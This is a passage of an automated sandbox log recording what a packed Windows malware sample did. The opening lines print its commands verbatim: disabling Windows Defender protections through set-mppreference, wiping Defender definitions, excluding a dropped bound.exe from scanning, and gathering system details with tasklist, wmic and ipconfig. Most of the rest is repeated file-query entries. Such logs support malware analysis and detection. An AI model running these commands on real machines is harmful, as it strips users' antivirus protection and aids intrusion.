                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD29570 cpuid 0_2_00007FF7EAD29570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\blank.aes VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
